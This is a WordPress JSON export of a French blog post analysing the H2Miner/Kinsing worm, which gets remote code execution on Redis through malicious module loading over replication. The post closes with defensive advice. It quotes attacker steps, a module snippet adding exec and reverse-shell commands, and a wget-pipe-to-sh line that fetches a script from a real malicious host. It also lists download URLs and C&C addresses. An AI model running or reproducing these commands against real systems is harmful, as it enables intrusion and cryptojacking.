{"id":55714,"date":"2020-01-27T00:00:00","date_gmt":"2020-01-26T21:00:00","guid":{"rendered":"https:\/\/prohoster.info\/blog\/blog_prohoster\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce"},"modified":"2020-02-18T14:03:51","modified_gmt":"2020-02-18T11:03:51","slug":"obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","status":"publish","type":"post","link":"https:\/\/prohoster.info\/fr\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","title":{"rendered":"Une nouvelle \u00e9pid\u00e9mie de vers H2Miner exploitant Redis RCE a \u00e9t\u00e9 d\u00e9tect\u00e9e.","gt_translate_keys":[{"key":"rendered","format":"text"}]},"content":{"rendered":"<blockquote><p>Il y a un jour, l'un des serveurs de mon projet a \u00e9t\u00e9 attaqu\u00e9 par un ver similaire. \u00c0 la recherche d'une r\u00e9ponse \u00e0 la question \u00ab qu'est-ce que c'\u00e9tait ? \u00bb, j'ai trouv\u00e9 un excellent article de l'\u00e9quipe de Alibaba Cloud Security. Comme je n'ai pas trouv\u00e9 cet article sur Habrahabr, j'ai d\u00e9cid\u00e9 de le traduire sp\u00e9cialement pour vous &lt;3\n<\/p><\/blockquote>\n<h2>Introduction<\/h2>\n<p>\nR\u00e9cemment, l'\u00e9quipe de s\u00e9curit\u00e9 d'Alibaba Cloud a d\u00e9couvert une \u00e9pid\u00e9mie soudaine de H2Miner. Ce type de ver malveillant exploite l'absence d'autorisation ou des mots de passe faibles pour Redis comme portes d'entr\u00e9e \u00e0 vos syst\u00e8mes, puis synchronise son propre module malveillant avec le slave via la synchronisation master-slave et, enfin, t\u00e9l\u00e9charge ce module malveillant sur la machine cibl\u00e9e et ex\u00e9cute des instructions malveillantes.<\/p>\n<p>Autrefois, les attaques sur vos syst\u00e8mes \u00e9taient principalement effectu\u00e9es par un m\u00e9thode impliquant des t\u00e2ches planifi\u00e9es ou des cl\u00e9s SSH qui \u00e9taient \u00e9crites sur votre machine apr\u00e8s que l'intrus ait acc\u00e9d\u00e9 \u00e0 Redis. Heureusement, cette m\u00e9thode n'est pas souvent utilis\u00e9e en raison de probl\u00e8mes de contr\u00f4le des autorisations ou \u00e0 cause de diff\u00e9rentes versions du syst\u00e8me. N\u00e9anmoins, ce mode de t\u00e9l\u00e9chargement de module malveillant peut directement ex\u00e9cuter des commandes de l'attaquant ou acc\u00e9der au shell, ce qui est dangereux pour votre syst\u00e8me.<\/p>\n<p>En raison du grand nombre <a class=\"wpil_keyword_link\" href=\"https:\/\/prohoster.info\/fr\/server\/\"   title=\"serveurs\" data-wpil-keyword-link=\"linked\"  data-wpil-monitor-id=\"1464\">serveurs<\/a> de Redis, h\u00e9berg\u00e9s sur Internet (pr\u00e8s d'un million), l'\u00e9quipe de s\u00e9curit\u00e9 d'Alibaba Cloud, en tant que rappel amical, recommande aux utilisateurs de ne pas fournir d'acc\u00e8s \u00e0 Redis depuis le r\u00e9seau et de v\u00e9rifier r\u00e9guli\u00e8rement la robustesse de leurs mots de passe, et s'ils ne sont pas vuln\u00e9rables \u00e0 une attaque par force brute.<\/p>\n<h2>H2Miner<\/h2>\n<p>\nH2Miner est un botnet de minage pour les syst\u00e8mes bas\u00e9s sur Linux, qui peut infiltrer votre syst\u00e8me de diff\u00e9rentes mani\u00e8res, y compris l'absence d'autorisation dans Hadoop YARN, Docker, et une vuln\u00e9rabilit\u00e9 d'ex\u00e9cution de commande \u00e0 distance Redis (RCE). Le botnet fonctionne en t\u00e9l\u00e9chargeant des scripts malveillants et des logiciels malveillants pour miner vos donn\u00e9es, \u00e9largir horizontalement l'attaque et maintenir une communication de commande et de contr\u00f4le (C&amp;C).<br \/>\n<noindex><a rel=\"nofollow\" name=\"habracut\"><\/a><\/noindex><\/p>\n<h2>RCE Redis<\/h2>\n<p>\nPavel Toporkov a partag\u00e9 ses connaissances sur ce sujet lors de ZeroNights 2018. Depuis la version 4.0, Redis prend en charge la fonction de chargement de modules externes, qui permet aux utilisateurs de charger des fichiers so, compil\u00e9s avec C dans Redis pour ex\u00e9cuter certaines commandes Redis. Cette fonction, bien que utile, pr\u00e9sente une vuln\u00e9rabilit\u00e9, o\u00f9 en mode master-slave, les fichiers peuvent \u00eatre synchronis\u00e9s avec le slave via le mode fullresync. Cela peut \u00eatre exploit\u00e9 par un attaquant pour transmettre des fichiers so malveillants. Une fois le transfert termin\u00e9, les attaquants chargent le module sur l'instance Redis attaqu\u00e9e et ex\u00e9cutent n'importe quelle commande.<\/p>\n<h2>Analyse du ver malveillant<\/h2>\n<p>\nR\u00e9cemment, l'\u00e9quipe de s\u00e9curit\u00e9 d'Alibaba Cloud a d\u00e9couvert que la taille du groupe de mineurs malveillants H2Miner avait soudainement augment\u00e9. Selon l'analyse, le processus global de l'attaque se d\u00e9roule comme suit :<\/p>\n<p><img decoding=\"async\" alt=\"Une nouvelle \u00e9pid\u00e9mie de vers H2Miner exploitant Redis RCE a \u00e9t\u00e9 d\u00e9tect\u00e9e.\" src=\"\/wp-content\/uploads\/2020\/01\/e4e47a0ddb0bd9f8d97dd992f3349016.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nH2Miner utilise RCE Redis pour une attaque compl\u00e8te. Tout d'abord, les attaquants ciblent des serveurs Redis non prot\u00e9g\u00e9s ou des serveurs avec des mots de passe faibles.<\/p>\n<p>Ensuite, ils utilisent la commande <code>config set dbfilename red2.so<\/code> pour changer le nom du fichier. Apr\u00e8s cela, les attaquants ex\u00e9cutent la commande <code>slaveof<\/code> pour d\u00e9finir l'adresse de l'h\u00f4te de r\u00e9plication master-slave. <\/p>\n<p>Lorsque l'instance Redis attaqu\u00e9e \u00e9tablit une connexion master-slave avec le Redis malveillant appartenant \u00e0 l'attaquant, ce dernier envoie le module infect\u00e9 \u00e0 l'aide de la commande fullresync pour synchroniser les fichiers. Ensuite, le fichier red2.so sera charg\u00e9 sur la machine attaqu\u00e9e. Les attaquants utilisent ensuite le module .\\\/red2.so pour charger ce fichier so. Le module peut ex\u00e9cuter des commandes de l'attaquant ou initier une connexion invers\u00e9e (backdoor) pour acc\u00e9der \u00e0 la machine attaqu\u00e9e.<\/p>\n<pre><code class=\"plaintext\">if (RedisModule_CreateCommand(ctx, \"system.exec\",\n        DoCommand, \"readonly\", 1, 1, 1) == REDISMODULE_ERR)\n        return REDISMODULE_ERR;\n      if (RedisModule_CreateCommand(ctx, \"system.rev\",\n        RevShellCommand, \"readonly\", 1, 1, 1) == REDISMODULE_ERR)\n        return REDISMODULE_ERR;\n<\/code><\/pre>\n<p>\nApr\u00e8s avoir ex\u00e9cut\u00e9 une commande malveillante, comme <code>\/ bin \/ sh -c wget -q -O-http:\/\/195.3.146.118\/unk.sh | sh&gt; \/ dev \/ null 2&gt; &amp; 1<\/code>, l'attaquant supprimera le nom du fichier de sauvegarde et d\u00e9chargera le module syst\u00e8me pour effacer les traces. Cependant, le fichier red2.so restera sur la machine attaqu\u00e9e. Il est conseill\u00e9 aux utilisateurs de pr\u00eater attention \u00e0 la pr\u00e9sence d'un tel fichier suspect dans le dossier de leur instance Redis.<\/p>\n<p>En plus de d\u00e9truire certains processus malveillants pour voler des ressources, l'attaquant a suivi un sc\u00e9nario malveillant en t\u00e9l\u00e9chargeant et ex\u00e9cutant des fichiers malveillants au format binaire afin de <noindex><a rel=\"nofollow\" href=\"http:\/\/142.44.191.122\/kinsing\">142.44.191.122\/kinsing<\/a><\/noindex>. Cela signifie que le nom du processus ou le nom du r\u00e9pertoire contenant kinsing sur l'h\u00f4te peut indiquer que cette machine a \u00e9t\u00e9 infect\u00e9e par ce virus.<\/p>\n<p>Selon les r\u00e9sultats de l'ing\u00e9nierie inverse, le logiciel malveillant ex\u00e9cute principalement les fonctions suivantes :<\/p>\n<ul>\n<li>T\u00e9l\u00e9chargement et ex\u00e9cution de fichiers<\/li>\n<li>Mining<\/li>\n<li>Maintien de la communication C&amp;C et ex\u00e9cution des commandes de l'attaquant<\/li>\n<\/ul>\n<p>\n<img decoding=\"async\" alt=\"Une nouvelle \u00e9pid\u00e9mie de vers H2Miner exploitant Redis RCE a \u00e9t\u00e9 d\u00e9tect\u00e9e.\" src=\"\/wp-content\/uploads\/2020\/01\/43229670fd28e4b7f1974aa3c36dc3ca.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<br \/>\nUtilisez masscan pour le scan externe afin d'\u00e9tendre l'influence. De plus, l'adresse IP du serveur C&amp;C est cod\u00e9e en dur dans le programme, et l'h\u00f4te cibl\u00e9 communiquera avec le serveur C&amp;C via des requ\u00eates HTTP, o\u00f9 les informations du zombie (serveur compromis) sont identifi\u00e9es dans l'en-t\u00eate HTTP.<\/p>\n<p><img decoding=\"async\" alt=\"Une nouvelle \u00e9pid\u00e9mie de vers H2Miner exploitant Redis RCE a \u00e9t\u00e9 d\u00e9tect\u00e9e.\" src=\"\/wp-content\/uploads\/2020\/01\/111ba916fa76f45fe458622f260b1d8e.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<pre><code class=\"plaintext\">GET \/h HTTP\/1.1\nHost: 91.215.169.111\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/78.0.3904.108 Safari\/537.36\nArch: amd64\nCores: 2\nMem: 3944\nOs: linux\nOsname: debian\nOsversion: 10.0\nRoot: false\nS: k\nUuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx\nVersion: 26\nAccept-Encoding: gzip\n<\/code><\/pre>\n<p><\/p>\n<h2>Autres m\u00e9thodes d'attaque<\/h2>\n<p>\n<img decoding=\"async\" alt=\"Une nouvelle \u00e9pid\u00e9mie de vers H2Miner exploitant Redis RCE a \u00e9t\u00e9 d\u00e9tect\u00e9e.\" src=\"\/wp-content\/uploads\/2020\/01\/51c088251ac8fd71d229bfe96e239c29.jpg\" style=\"display:block;margin: 0 auto;\" \/><br \/>\n<\/p>\n<h2>Adresses et liens utilis\u00e9s par le ver<\/h2>\n<p>\n\/kinsing<\/p>\n<pre><code class=\"plaintext\">\u2022 142.44.191.122\/t.sh\n\u2022 185.92.74.42\/h.sh\n\u2022 142.44.191.122\/spr.sh\n\u2022 142.44.191.122\/spre.sh\n\u2022 195.3.146.118\/unk.sh\n<\/code><\/pre>\n<p>\nc&amp;c<\/p>\n<pre><code class=\"plaintext\">\u2022 45.10.88.102\n\u2022 91.215.169.111\n\u2022 139.99.50.255\n\u2022 46.243.253.167\n\u2022 195.123.220.193\n<\/code><\/pre>\n<p><\/p>\n<h2>Conseil<\/h2>\n<p>\nTout d'abord, Redis ne doit pas \u00eatre accessible depuis Internet et doit \u00eatre prot\u00e9g\u00e9 par un mot de passe solide. Il est \u00e9galement important que les clients v\u00e9rifient l'absence du fichier red2.so dans le r\u00e9pertoire Redis et l'absence de \u00ab kinsing \u00bb dans le nom de fichier \/ processus sur l'h\u00f4te.<br \/>\n<br \/>Source : <a content=\"nofollow\" rel=\"nofollow\" href=\"https:\/\/habr.com\/ru\/post\/485300\/\">habr.com<\/a><\/p>","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"excerpt":{"rendered":"<p>\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security. \u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u044f \u043d\u0435 \u043d\u0430\u0448\u0435\u043b \u044d\u0442\u043e\u0442 \u0441\u0442\u0430\u0442\u044c\u0438 \u043d\u0430 \u0445\u0430\u0431\u0440\u0435, \u0442\u043e \u0440\u0435\u0448\u0438\u043b \u043f\u0435\u0440\u0435\u0432\u0435\u0441\u0442\u0438 \u0435\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0434\u043b\u044f \u0432\u0430\u0441 &lt;3 \u0412\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0435 \u041d\u0435\u0434\u0430\u0432\u043d\u043e \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Alibaba Cloud \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430 \u0432\u043d\u0435\u0437\u0430\u043f\u043d\u0443\u044e \u0432\u0441\u043f\u044b\u0448\u043a\u0443 H2Miner. [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[688],"tags":[],"class_list":["post-55714","post","type-post","status-publish","format-standard","hentry","category-administrirovanie"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.2 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/fr\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.2\" \/>\n\t\t<meta property=\"og:locale\" content=\"fr_FR\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0432\u0441\u043f\u044b\u0448\u043a\u0430 H2Miner \u0447\u0435\u0440\u0432\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 Redis RCE | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/fr\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2020-01-26T21:00:00+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2020-02-18T11:03:51+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47 Nouvelle \u00e9pid\u00e9mie de vers H2Miner d\u00e9tect\u00e9e, exploitant Redis RCE | ProHoster","description":"Hier, l'un des serveurs de mon projet a \u00e9t\u00e9 attaqu\u00e9 par un ver similaire. \u00c0 la recherche d'une r\u00e9ponse \u00e0 la question \u00ab qu'est-ce que c'\u00e9tait ? \u00bb, j'ai trouv\u00e9 un article fascinant de l'\u00e9quipe de s\u00e9curit\u00e9 d'Alibaba Cloud.","canonical_url":"https:\/\/prohoster.info\/fr\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"fr_FR","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043d\u043e\u0432\u0430\u044f \u0432\u0441\u043f\u044b\u0448\u043a\u0430 H2Miner \u0447\u0435\u0440\u0432\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 Redis RCE | ProHoster","og:description":"\u0414\u0435\u043d\u044c \u043d\u0430\u0437\u0430\u0434 \u043e\u0434\u0438\u043d \u0438\u0437 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u043c\u043e\u0435\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0431\u044b\u043b \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u043d \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u043c \u0447\u0435\u0440\u0432\u0435\u043c. \u0412 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u043e\u0442\u0432\u0435\u0442\u0430 \u043d\u0430 \u0432\u043e\u043f\u0440\u043e\u0441 \u00ab\u0447\u0442\u043e \u0436\u0435 \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0442\u0430\u043a\u043e\u0435?\u00bb \u044f \u043d\u0430\u0448\u0435\u043b \u0437\u0430\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u0443\u044e \u0441\u0442\u0430\u0442\u044c\u044e \u043a\u043e\u043c\u0430\u043d\u0434\u044b Alibaba Cloud Security.","og:url":"https:\/\/prohoster.info\/fr\/blog\/administrirovanie\/obnaruzhena-novaya-vspyshka-h2miner-chervej-kotorye-ekspluatiruyut-redis-rce","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2020-01-26T21:00:00+00:00","article:modified_time":"2020-02-18T11:03:51+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"55714","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":null,"breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-02-28 19:38:31","updated":"2026-02-09 16:50:17","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/posts\/55714","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/comments?post=55714"}],"version-history":[{"count":1,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/posts\/55714\/revisions"}],"predecessor-version":[{"id":158708,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/posts\/55714\/revisions\/158708"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/media?parent=55714"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/categories?post=55714"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/fr\/wp-json\/wp\/v2\/tags?post=55714"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}